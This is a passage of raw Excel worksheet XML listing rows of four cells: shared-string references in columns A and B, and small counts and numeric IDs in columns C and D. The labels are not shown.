        <v>16231</v>
      </c>
      <c r="B20911" t="s">
        <v>16214</v>
      </c>
      <c r="C20911">
        <v>0</v>
      </c>
      <c r="D20911">
        <v>1826</v>
      </c>
    </row>
    <row r="20912" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20912" t="s">
        <v>16228</v>
      </c>
      <c r="B20912" t="s">
        <v>16215</v>
      </c>
      <c r="C20912">
        <v>1</v>
      </c>
      <c r="D20912">
        <v>1826</v>
      </c>
    </row>
    <row r="20913" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20913" t="s">
        <v>16231</v>
      </c>
      <c r="B20913" t="s">
        <v>16216</v>
      </c>
      <c r="C20913">
        <v>0</v>
      </c>
      <c r="D20913">
        <v>1826</v>
      </c>
    </row>
    <row r="20914" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20914" t="s">
        <v>16228</v>
      </c>
      <c r="B20914" t="s">
        <v>16217</v>
      </c>
      <c r="C20914">
        <v>2</v>
      </c>
      <c r="D20914">
        <v>1826</v>
      </c>
    </row>
    <row r="20915" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20915" t="s">
        <v>16231</v>
      </c>
      <c r="B20915" t="s">
        <v>16218</v>
      </c>
      <c r="C20915">
        <v>0</v>
      </c>
      <c r="D20915">
        <v>1826</v>
      </c>
    </row>
    <row r="20916" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20916" t="s">
        <v>16229</v>
      </c>
      <c r="B20916" t="s">
        <v>16219</v>
      </c>
      <c r="C20916">
        <v>0</v>
      </c>
      <c r="D20916">
        <v>1826</v>
      </c>
    </row>
    <row r="20917" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20917" t="s">
        <v>16230</v>
      </c>
      <c r="B20917" t="s">
        <v>16220</v>
      </c>
      <c r="C20917">
        <v>0</v>
      </c>
      <c r="D20917">
        <v>1826</v>
      </c>
    </row>
    <row r="20918" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20918" t="s">
        <v>16229</v>
      </c>
      <c r="B20918" t="s">
        <v>16221</v>
      </c>
      <c r="C20918">
        <v>0</v>
      </c>
      <c r="D20918">
        <v>1826</v>
      </c>
    </row>
    <row r="20919" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20919" t="s">
        <v>16230</v>
      </c>
      <c r="B20919" t="s">
        <v>16222</v>
      </c>
      <c r="C20919">
        <v>0</v>
      </c>
      <c r="D20919">
        <v>1826</v>
      </c>
    </row>
    <row r="20920" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20920" t="s">
        <v>16223</v>
      </c>
      <c r="B20920" t="s">
        <v>16223</v>
      </c>
      <c r="C20920">
        <v>30</v>
      </c>
      <c r="D20920">
        <v>1826</v>
      </c>
    </row>
    <row r="20921" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20921" t="s">
        <v>16224</v>
      </c>
      <c r="B20921" t="s">
        <v>16224</v>
      </c>
      <c r="C20921">
        <v>0</v>
      </c>
      <c r="D20921">
        <v>1826</v>
      </c>
    </row>
    <row r="20922" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20922" t="s">
        <v>16228</v>
      </c>
      <c r="B20922" t="s">
        <v>16211</v>
      </c>
      <c r="C20922">
        <v>2</v>
      </c>
      <c r="D20922">
        <v>5697</v>
      </c>
    </row>
    <row r="20923" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20923" t="s">
        <v>16231</v>
      </c>
      <c r="B20923" t="s">
        <v>16212</v>
      </c>
      <c r="C20923">
        <v>0</v>
      </c>
      <c r="D20923">
        <v>5697</v>
      </c>
    </row>
    <row r="20924" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20924" t="s">
        <v>16228</v>
      </c>
      <c r="B20924" t="s">
        <v>16213</v>
      </c>
      <c r="C20924">
        <v>0</v>
      </c>
      <c r="D20924">
        <v>5697</v>
      </c>
    </row>
    <row r="20925" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20925" t="s">
        <v>16231</v>
      </c>
      <c r="B20925" t="s">
        <v>16214</v>
      </c>
      <c r="C20925">
        <v>0</v>
      </c>
      <c r="D20925">
        <v>5697</v>
      </c>
    </row>
    <row r="20926" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20926" t="s">
        <v>16228</v>
      </c>
      <c r="B20926" t="s">
        <v>16215</v>
      </c>
      <c r="C20926">
        <v>10</v>
      </c>
      <c r="D20926">
        <v>5697</v>
      </c>
    </row>
    <row r="20927" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20927" t="s">
        <v>16231</v>
      </c>
      <c r="B20927" t="s">
        <v>16216</v>
      </c>
      <c r="C20927">
        <v>29</v>
      </c>
      <c r="D20927">
        <v>5697</v>
      </c>
    </row>
    <row r="20928" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20928" t="s">
        <v>16228</v>
      </c>
      <c r="B20928" t="s">
        <v>16217</v>
      </c>
      <c r="C20928">
        <v>36</v>
      </c>
      <c r="D20928">
        <v>5697</v>
      </c>
    </row>
    <row r="20929" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20929" t="s">
        <v>16231</v>
      </c>
      <c r="B20929" t="s">
        <v>16218</v>
      </c>
      <c r="C20929">
        <v>50</v>
      </c>
      <c r="D20929">
        <v>5697</v>
      </c>
    </row>
    <row r="20930" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20930" t="s">
        <v>16229</v>
      </c>
      <c r="B20930" t="s">
        <v>16219</v>
      </c>
      <c r="C20930">
        <v>1</v>
      </c>
      <c r="D20930">
        <v>5697</v>
      </c>
    </row>
    <row r="20931" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20931" t="s">
        <v>16230</v>
      </c>
      <c r="B20931" t="s">
        <v>16220</v>
      </c>
      <c r="C20931">
        <v>4</v>
      </c>
      <c r="D20931">
        <v>5697</v>
      </c>
    </row>
    <row r="20932" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20932" t="s">
        <v>16229</v>
      </c>
      <c r="B20932" t="s">
        <v>16221</v>
      </c>
      <c r="C20932">
        <v>4</v>
      </c>
      <c r="D20932">
        <v>5697</v>
      </c>
    </row>
    <row r="20933" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20933" t="s">
        <v>16230</v>
      </c>
      <c r="B20933" t="s">
        <v>16222</v>
      </c>
      <c r="C20933">
        <v>1</v>
      </c>
      <c r="D20933">
        <v>5697</v>
      </c>
    </row>
    <row r="20934" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20934" t="s">
        <v>16223</v>
      </c>
      <c r="B20934" t="s">
        <v>16223</v>
      </c>
      <c r="C20934">
        <v>25</v>
      </c>
      <c r="D20934">
        <v>5697</v>
      </c>
    </row>
    <row r="20935" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20935" t="s">
        <v>16224</v>
      </c>
      <c r="B20935" t="s">
        <v>16224</v>
      </c>
      <c r="C20935">
        <v>3</v>
      </c>
      <c r="D20935">
        <v>5697</v>
      </c>
    </row>
    <row r="20936" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20936" t="s">
        <v>16228</v>
      </c>
      <c r="B20936" t="s">
        <v>16211</v>
      </c>
      <c r="C20936">
        <v>4</v>
      </c>
      <c r="D20936">
        <v>5697</v>
      </c>
    </row>
    <row r="20937" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20937" t="s">
        <v>16228</v>
      </c>
      <c r="B20937" t="s">
        <v>16211</v>
      </c>
      <c r="C20937">
        <v>0</v>
      </c>
      <c r="D20937">
        <v>5631</v>
      </c>
    </row>
    <row r="20938" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20938" t="s">
        <v>16231</v>
      </c>
      <c r="B20938" t="s">
        <v>16212</v>
      </c>
      <c r="C20938">
        <v>0</v>
      </c>
      <c r="D20938">
        <v>5631</v>
      </c>
    </row>
    <row r="20939" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20939" t="s">
        <v>16228</v>
      </c>
      <c r="B20939" t="s">
        <v>16213</v>
      </c>
      <c r="C20939">
        <v>0</v>
      </c>
      <c r="D20939">
        <v>5631</v>
      </c>
    </row>
    <row r="20940" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20940" t="s">
        <v>16231</v>
      </c>
      <c r="B20940" t="s">
        <v>16214</v>
      </c>
      <c r="C20940">
        <v>0</v>
      </c>
      <c r="D20940">
        <v>5631</v>
      </c>
    </row>
    <row r="20941" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20941" t="s">
        <v>16228</v>
      </c>
      <c r="B20941" t="s">
        <v>16215</v>
      </c>
      <c r="C20941">
        <v>6</v>
      </c>
      <c r="D20941">
        <v>5631</v>
      </c>
    </row>
    <row r="20942" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20942" t="s">
        <v>16231</v>
      </c>
      <c r="B20942" t="s">
        <v>16216</v>
      </c>
      <c r="C20942">
        <v>9</v>
      </c>
      <c r="D20942">
        <v>5631</v>
      </c>
    </row>
    <row r="20943" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20943" t="s">
        <v>16228</v>
      </c>
      <c r="B20943" t="s">
        <v>16217</v>
      </c>
      <c r="C20943">
        <v>10</v>
      </c>
      <c r="D20943">
        <v>5631</v>
      </c>
    </row>
    <row r="20944" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20944" t="s">
        <v>16231</v>
      </c>
      <c r="B20944" t="s">
        <v>16218</v>
      </c>
      <c r="C20944">
        <v>8</v>
      </c>
      <c r="D20944">
        <v>5631</v>
      </c>
    </row>
    <row r="20945" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20945" t="s">
        <v>16229</v>
      </c>
      <c r="B20945" t="s">
        <v>16219</v>
      </c>
      <c r="C20945">
        <v>0</v>
      </c>
      <c r="D20945">
        <v>5631</v>
      </c>
    </row>
    <row r="20946" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20946" t="s">
        <v>16230</v>
      </c>
      <c r="B20946" t="s">
        <v>16220</v>
      </c>
      <c r="C20946">
        <v>0</v>
      </c>
      <c r="D20946">
        <v>5631</v>
      </c>
    </row>
    <row r="20947" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20947" t="s">
        <v>16229</v>
      </c>
      <c r="B20947" t="s">
        <v>16221</v>
      </c>
      <c r="C20947">
        <v>135</v>
      </c>
      <c r="D20947">
        <v>5631</v>
      </c>
    </row>
    <row r="20948" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20948" t="s">
        <v>16230</v>
      </c>
      <c r="B20948" t="s">
        <v>16222</v>
      </c>
      <c r="C20948">
        <v>17</v>
      </c>
      <c r="D20948">
        <v>5631</v>
      </c>
    </row>
    <row r="20949" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20949" t="s">
        <v>16223</v>
      </c>
      <c r="B20949" t="s">
        <v>16223</v>
      </c>
      <c r="C20949">
        <v>25</v>
      </c>
      <c r="D20949">
        <v>5631</v>
      </c>
    </row>
    <row r="20950" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20950" t="s">
        <v>16224</v>
      </c>
      <c r="B20950" t="s">
        <v>16224</v>
      </c>
      <c r="C20950">
        <v>0</v>
      </c>
      <c r="D20950">
        <v>5631</v>
      </c>
    </row>
    <row r="20951" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20951" t="s">
        <v>16228</v>
      </c>
      <c r="B20951" t="s">
        <v>16211</v>
      </c>
      <c r="C20951">
        <v>0</v>
      </c>
      <c r="D20951">
        <v>5688</v>
      </c>
    </row>
    <row r="20952" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20952" t="s">
        <v>16231</v>
      </c>
      <c r="B20952" t="s">
        <v>16212</v>
      </c>
      <c r="C20952">
        <v>0</v>
      </c>
      <c r="D20952">
        <v>5688</v>
      </c>
    </row>
    <row r="20953" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20953" t="s">
        <v>16228</v>
      </c>
      <c r="B20953" t="s">
        <v>16213</v>
      </c>
      <c r="C20953">
        <v>0</v>
      </c>
      <c r="D20953">
        <v>5688</v>
      </c>
    </row>
    <row r="20954" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20954" t="s">
        <v>16231</v>
      </c>
      <c r="B20954" t="s">
        <v>16214</v>
      </c>
      <c r="C20954">
        <v>0</v>
      </c>
      <c r="D20954">
        <v>5688</v>
      </c>
    </row>
    <row r="20955" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20955" t="s">
        <v>16228</v>
      </c>
      <c r="B20955" t="s">
        <v>16215</v>
      </c>
      <c r="C20955">
        <v>0</v>
      </c>
      <c r="D20955">
        <v>5688</v>
      </c>
    </row>
    <row r="20956" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20956" t="s">
        <v>16231</v>
      </c>
      <c r="B20956" t="s">
        <v>16216</v>
      </c>
      <c r="C20956">
        <v>0</v>
      </c>
      <c r="D20956">
        <v>5688</v>
      </c>
    </row>
    <row r="20957" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20957" t="s">
        <v>16228</v>
      </c>
      <c r="B20957" t="s">
        <v>16217</v>
      </c>
      <c r="C20957">
        <v>1</v>
      </c>
      <c r="D20957">
        <v>5688</v>
      </c>
    </row>
    <row r="20958" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20958" t="s">
        <v>16231</v>
      </c>
      <c r="B20958" t="s">
        <v>16218</v>
      </c>
      <c r="C20958">
        <v>4</v>
      </c>
      <c r="D20958">
        <v>5688</v>
      </c>
    </row>
    <row r="20959" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20959" t="s">
        <v>16229</v>
      </c>
      <c r="B20959" t="s">
        <v>16219</v>
      </c>
      <c r="C20959">
        <v>0</v>
      </c>
      <c r="D20959">
        <v>5688</v>
      </c>
    </row>
    <row r="20960" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20960" t="s">
        <v>16230</v>
      </c>
      <c r="B20960" t="s">
        <v>16220</v>
      </c>
      <c r="C20960">
        <v>0</v>
      </c>
      <c r="D20960">
        <v>5688</v>
      </c>
    </row>
    <row r="20961" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20961" t="s">
        <v>16229</v>
      </c>
      <c r="B20961" t="s">
        <v>16221</v>
      </c>
      <c r="C20961">
        <v>0</v>
      </c>
      <c r="D20961">
        <v>5688</v>
      </c>
    </row>
    <row r="20962" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20962" t="s">
        <v>16230</v>
      </c>
      <c r="B20962" t="s">
        <v>16222</v>
      </c>
      <c r="C20962">
        <v>0</v>
      </c>
      <c r="D20962">
        <v>5688</v>
      </c>
    </row>
    <row r="20963" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20963" t="s">
        <v>16223</v>
      </c>
      <c r="B20963" t="s">
        <v>16223</v>
      </c>
      <c r="C20963">
        <v>24</v>
      </c>
      <c r="D20963">
        <v>5688</v>
      </c>
    </row>
    <row r="20964" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20964" t="s">
        <v>16224</v>
      </c>
      <c r="B20964" t="s">
        <v>16224</v>
      </c>
      <c r="C20964">
        <v>0</v>
      </c>
      <c r="D20964">
        <v>5688</v>
      </c>
    </row>
    <row r="20965" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20965" t="s">
        <v>16228</v>
      </c>
      <c r="B20965" t="s">
        <v>16211</v>
      </c>
      <c r="C20965">
        <v>0</v>
      </c>
      <c r="D20965">
        <v>5678</v>
      </c>
    </row>
    <row r="20966" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20966" t="s">
        <v>16231</v>
      </c>
      <c r="B20966" t="s">
        <v>16212</v>
      </c>
      <c r="C20966">
        <v>0</v>
      </c>
      <c r="D20966">
        <v>5678</v>
      </c>
    </row>
    <row r="20967" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20967" t="s">
        <v>16228</v>
      </c>
      <c r="B20967" t="s">
        <v>16213</v>
      </c>
      <c r="C20967">
        <v>0</v>
      </c>
      <c r="D20967">
        <v>5678</v>
      </c>
    </row>
    <row r="20968" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20968" t="s">
        <v>16231</v>
      </c>
      <c r="B20968" t="s">
        <v>16214</v>
      </c>
      <c r="C20968">
        <v>0</v>
      </c>
      <c r="D20968">
        <v>5678</v>
      </c>
    </row>
    <row r="20969" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20969" t="s">
        <v>16228</v>
      </c>
      <c r="B20969" t="s">
        <v>16215</v>
      </c>
      <c r="C20969">
        <v>0</v>
      </c>
      <c r="D20969">
        <v>5678</v>
      </c>
    </row>
    <row r="20970" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20970" t="s">
        <v>16231</v>
      </c>
      <c r="B20970" t="s">
        <v>16216</v>
      </c>
      <c r="C20970">
        <v>0</v>
      </c>
      <c r="D20970">
        <v>5678</v>
      </c>
    </row>
    <row r="20971" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20971" t="s">
        <v>16228</v>
      </c>
      <c r="B20971" t="s">
        <v>16217</v>
      </c>
      <c r="C20971">
        <v>1</v>
      </c>
      <c r="D20971">
        <v>5678</v>
      </c>
    </row>
    <row r="20972" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20972" t="s">
        <v>16231</v>
      </c>
      <c r="B20972" t="s">
        <v>16218</v>
      </c>
      <c r="C20972">
        <v>4</v>
      </c>
      <c r="D20972">
        <v>5678</v>
      </c>
    </row>
    <row r="20973" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20973" t="s">
        <v>16229</v>
      </c>
      <c r="B20973" t="s">
        <v>16219</v>
      </c>
      <c r="C20973">
        <v>0</v>
      </c>
      <c r="D20973">
        <v>5678</v>
      </c>
    </row>
    <row r="20974" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20974" t="s">
        <v>16230</v>
      </c>
      <c r="B20974" t="s">
        <v>16220</v>
      </c>
      <c r="C20974">
        <v>0</v>
      </c>
      <c r="D20974">
        <v>5678</v>
      </c>
    </row>
    <row r="20975" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20975" t="s">
        <v>16229</v>
      </c>
      <c r="B20975" t="s">
        <v>16221</v>
      </c>
      <c r="C20975">
        <v>0</v>
      </c>
      <c r="D20975">
        <v>5678</v>
      </c>
    </row>
    <row r="20976" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20976" t="s">
        <v>16230</v>
      </c>
      <c r="B20976" t="s">
        <v>16222</v>
      </c>
      <c r="C20976">
        <v>0</v>
      </c>
      <c r="D20976">
        <v>5678</v>
      </c>
    </row>
    <row r="20977" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20977" t="s">
        <v>16223</v>
      </c>
      <c r="B20977" t="s">
        <v>16223</v>
      </c>
      <c r="C20977">
        <v>24</v>
      </c>
      <c r="D20977">
        <v>5678</v>
      </c>
    </row>
    <row r="20978" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20978" t="s">
        <v>16224</v>
      </c>
      <c r="B20978" t="s">
        <v>16224</v>
      </c>
      <c r="C20978">
        <v>0</v>
      </c>
      <c r="D20978">
        <v>5678</v>
      </c>
    </row>
    <row r="20979" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20979" t="s">
        <v>16228</v>
      </c>
      <c r="B20979" t="s">
        <v>16211</v>
      </c>
      <c r="C20979">
        <v>0</v>
      </c>
      <c r="D20979">
        <v>5680</v>
      </c>
    </row>
    <row r="20980" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20980" t="s">
        <v>16231</v>
      </c>
      <c r="B20980" t="s">
        <v>16212</v>
      </c>
      <c r="C20980">
        <v>0</v>
      </c>
      <c r="D20980">
        <v>5680</v>
      </c>
    </row>
    <row r="20981" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20981" t="s">
        <v>16228</v>
      </c>
      <c r="B20981" t="s">
        <v>16213</v>
      </c>
      <c r="C20981">
        <v>0</v>
      </c>
      <c r="D20981">
        <v>5680</v>
      </c>
    </row>
    <row r="20982" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20982" t="s">
        <v>16231</v>
      </c>
      <c r="B20982" t="s">
        <v>16214</v>
      </c>
      <c r="C20982">
        <v>0</v>
      </c>
      <c r="D20982">
        <v>5680</v>
      </c>
    </row>
    <row r="20983" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20983" t="s">
        <v>16228</v>
      </c>
      <c r="B20983" t="s">
        <v>16215</v>
      </c>
      <c r="C20983">
        <v>0</v>
      </c>
      <c r="D20983">
        <v>5680</v>
      </c>
    </row>
    <row r="20984" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20984" t="s">
        <v>16231</v>
      </c>
      <c r="B20984" t="s">
        <v>16216</v>
      </c>
      <c r="C20984">
        <v>1</v>
      </c>
      <c r="D20984">
        <v>5680</v>
      </c>
    </row>
    <row r="20985" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20985" t="s">
        <v>16228</v>
      </c>
      <c r="B20985" t="s">
        <v>16217</v>
      </c>
      <c r="C20985">
        <v>10</v>
      </c>
      <c r="D20985">
        <v>5680</v>
      </c>
    </row>
    <row r="20986" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20986" t="s">
        <v>16231</v>
      </c>
      <c r="B20986" t="s">
        <v>16218</v>
      </c>
      <c r="C20986">
        <v>1</v>
      </c>
      <c r="D20986">
        <v>5680</v>
      </c>
    </row>
    <row r="20987" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20987" t="s">
        <v>16229</v>
      </c>
      <c r="B20987" t="s">
        <v>16219</v>
      </c>
      <c r="C20987">
        <v>0</v>
      </c>
      <c r="D20987">
        <v>5680</v>
      </c>
    </row>
    <row r="20988" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20988" t="s">
        <v>16230</v>
      </c>
      <c r="B20988" t="s">
        <v>16220</v>
      </c>
      <c r="C20988">
        <v>0</v>
      </c>
      <c r="D20988">
        <v>5680</v>
      </c>
    </row>
    <row r="20989" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20989" t="s">
        <v>16229</v>
      </c>
      <c r="B20989" t="s">
        <v>16221</v>
      </c>
      <c r="C20989">
        <v>0</v>
      </c>
      <c r="D20989">
        <v>5680</v>
      </c>
    </row>
    <row r="20990" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20990" t="s">
        <v>16230</v>
      </c>
      <c r="B20990" t="s">
        <v>16222</v>
      </c>
      <c r="C20990">
        <v>0</v>
      </c>
      <c r="D20990">
        <v>5680</v>
      </c>
    </row>
    <row r="20991" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20991" t="s">
        <v>16223</v>
      </c>
      <c r="B20991" t="s">
        <v>16223</v>
      </c>
      <c r="C20991">
        <v>16</v>
      </c>
      <c r="D20991">
        <v>5680</v>
      </c>
    </row>
    <row r="20992" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20992" t="s">
        <v>16224</v>
      </c>
      <c r="B20992" t="s">
        <v>16224</v>
      </c>
      <c r="C20992">
        <v>1</v>
      </c>
      <c r="D20992">
        <v>5680</v>
      </c>
    </row>
    <row r="20993" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20993" t="s">
        <v>16228</v>
      </c>
      <c r="B20993" t="s">
        <v>16211</v>
      </c>
      <c r="C20993">
        <v>0</v>
      </c>
      <c r="D20993">
        <v>1848</v>
      </c>
    </row>
    <row r="20994" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20994" t="s">
        <v>16231</v>
      </c>
      <c r="B20994" t="s">
        <v>16212</v>
      </c>
      <c r="C20994">
        <v>0</v>
      </c>
      <c r="D20994">
        <v>1848</v>
      </c>
    </row>
    <row r="20995" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20995" t="s">
        <v>16228</v>
      </c>
      <c r="B20995" t="s">
        <v>16213</v>
      </c>
      <c r="C20995">
        <v>0</v>
      </c>
      <c r="D20995">
        <v>1848</v>
      </c>
    </row>
    <row r="20996" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20996" t="s">
        <v>16231</v>
      </c>
      <c r="B20996" t="s">
        <v>16214</v>
      </c>
      <c r="C20996">
        <v>0</v>
      </c>
      <c r="D20996">
        <v>1848</v>
      </c>
    </row>
    <row r="20997" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20997" t="s">
        <v>16228</v>
      </c>
      <c r="B20997" t="s">
        <v>16215</v>
      </c>
      <c r="C20997">
        <v>0</v>
      </c>
      <c r="D20997">
        <v>1848</v>
      </c>
    </row>
    <row r="20998" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20998" t="s">
        <v>16231</v>
      </c>
      <c r="B20998" t="s">
        <v>16216</v>
      </c>
      <c r="C20998">
        <v>0</v>
      </c>
      <c r="D20998">
        <v>1848</v>
      </c>
    </row>
    <row r="20999" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20999" t="s">
        <v>16228</v>
      </c>
      <c r="B20999" t="s">
        <v>16217</v>
      </c>
      <c r="C20999">
        <v>0</v>
      </c>
      <c r="D20999">
        <v>1848</v>
      </c>
    </row>
    <row r="21000" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21000" t="s">
        <v>16231</v>
      </c>
      <c r="B21000" t="s">
        <v>16218</v>
      </c>
      <c r="C21000">
        <v>0</v>
      </c>
      <c r="D21000">
        <v>1848</v>
      </c>
    </row>
    <row r="21001" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21001" t="s">
        <v>16229</v>
      </c>
      <c r="B21001" t="s">
        <v>16219</v>
      </c>
      <c r="C21001">
        <v>0</v>
      </c>
      <c r="D21001">
        <v>1848</v>
      </c>
    </row>
    <row r="21002" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21002" t="s">
        <v>16230</v>
      </c>
      <c r="B21002" t="s">
        <v>16220</v>
      </c>
      <c r="C21002">
        <v>0</v>
      </c>
      <c r="D21002">
        <v>1848</v>
      </c>
    </row>
    <row r="21003" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21003" t="s">
        <v>16229</v>
      </c>
      <c r="B21003" t="s">
        <v>16221</v>
      </c>
      <c r="C21003">
        <v>0</v>
      </c>
      <c r="D21003">
        <v>1848</v>
      </c>
    </row>
    <row r="21004" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21004" t="s">
        <v>16230</v>
      </c>
      <c r="B21004" t="s">
        <v>16222</v>
      </c>
      <c r="C21004">
        <v>0</v>
      </c>
      <c r="D21004">
        <v>1848</v>
      </c>
    </row>
    <row r="21005" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21005" t="s">
        <v>16223</v>
      </c>
      <c r="B21005" t="s">
        <v>16223</v>
      </c>
      <c r="C21005">
        <v>0</v>
      </c>
      <c r="D21005">
        <v>1848</v>
      </c>
    </row>
    <row r="21006" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21006" t="s">
        <v>16224</v>
      </c>
      <c r="B21006" t="s">
        <v>16224</v>
      </c>
      <c r="C21006">
        <v>0</v>
      </c>
      <c r="D21006">
        <v>1848</v>
      </c>
    </row>
    <row r="21007" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21007" t="s">
        <v>16231</v>
      </c>
      <c r="B21007" t="s">
        <v>16216</v>
      </c>
      <c r="C21007">
        <v>0</v>
      </c>
      <c r="D21007">
        <v>5641</v>
      </c>
    </row>
    <row r="21008" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21008" t="s">
        <v>16228</v>
      </c>
      <c r="B21008" t="s">
        <v>16211</v>
      </c>
      <c r="C21008">
        <v>0</v>
      </c>
      <c r="D21008">
        <v>5642</v>
      </c>
    </row>
    <row r="21009" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21009" t="s">
        <v>16231</v>
      </c>
      <c r="B21009" t="s">
        <v>16212</v>
      </c>
      <c r="C21009">
        <v>0</v>
      </c>
      <c r="D21009">
        <v>5642</v>
      </c>
    </row>
    <row r="21010" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21010" t="s">
        <v>16228</v>
      </c>
      <c r="B21010" t="s">
        <v>16213</v>
      </c>
      <c r="C21010">
        <v>1</v>
      </c>
      <c r="D21010">
        <v>5642</v>
      </c>
    </row>
    <row r="21011" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21011" t="s">
        <v>16231</v>
      </c>
      <c r="B21011" t="s">
        <v>16214</v>
      </c>
      <c r="C21011">
        <v>1</v>
      </c>
      <c r="D21011">
        <v>5642</v>
      </c>
    </row>
    <row r="21012" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21012" t="s">
        <v>16228</v>
      </c>
      <c r="B21012" t="s">
        <v>16215</v>
      </c>
      <c r="C21012">
        <v>2</v>
      </c>
      <c r="D21012">
        <v>5642</v>
      </c>
    </row>
    <row r="21013" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21013" t="s">
        <v>16231</v>
      </c>
      <c r="B21013" t="s">
        <v>16216</v>
      </c>
      <c r="C21013">
        <v>1</v>
      </c>
      <c r="D21013">
        <v>5642</v>
      </c>
    </row>
    <row r="21014" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21014" t="s">
        <v>16228</v>
      </c>
      <c r="B21014" t="s">
        <v>16217</v>
      </c>
      <c r="C21014">
        <v>3</v>
      </c>
      <c r="D21014">
        <v>5642</v>
      </c>
    </row>
    <row r="21015" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21015" t="s">
        <v>16231</v>
      </c>
      <c r="B21015" t="s">
        <v>16218</v>
      </c>
      <c r="C21015">
        <v>1</v>
      </c>
      <c r="D21015">
        <v>5642</v>
      </c>
    </row>
